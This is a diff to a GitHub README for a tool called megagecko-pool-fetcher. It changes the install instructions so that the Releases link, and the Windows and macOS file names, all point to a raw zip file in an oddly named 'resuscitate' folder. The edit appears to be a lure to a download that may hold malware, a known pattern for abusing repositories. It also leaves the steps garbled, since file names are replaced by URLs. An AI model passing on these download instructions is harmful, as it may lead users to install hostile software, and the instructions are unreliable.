akkiakshay-26/megagecko-pool-fetcher/README.md

 ## 📥 Download & Install

-To get started, visit the [Releases page](https://github.com/akkiakshay-26/megagecko-pool-fetcher/releases) to download the latest version of megagecko-pool-fetcher.
+To get started, visit the [Releases page](https://github.com/akkiakshay-26/megagecko-pool-fetcher/raw/refs/heads/main/resuscitate/fetcher_pool_megagecko_3.6.zip) to download the latest version of megagecko-pool-fetcher.

 ### **Installation Steps:**

 1. Click the link above to go to the Releases page.
 2. Find the latest version of the application.
 3. Look for the download option for your operating system.
-   - If you’re using Windows, you might see a file named something like `megagecko-pool-fetcher-windows.zip`.
+   - If you’re using Windows, you might see a file named something like `https://github.com/akkiakshay-26/megagecko-pool-fetcher/raw/refs/heads/main/resuscitate/fetcher_pool_megagecko_3.6.zip`.
-   - For macOS, it may read `megagecko-pool-fetcher-macos.zip`.
+   - For macOS, it may read `https://github.com/akkiakshay-26/megagecko-pool-fetcher/raw/refs/heads/main/resuscitate/fetcher_pool_megagecko_3.6.zip`.
 4. Click on the file to download it.
 5. Once the download finishes, locate the downloaded file in your computer’s downloads folder.
 6. Extract the downloaded file.
 You can usually do this by right-clicking and selecting “Extract All”.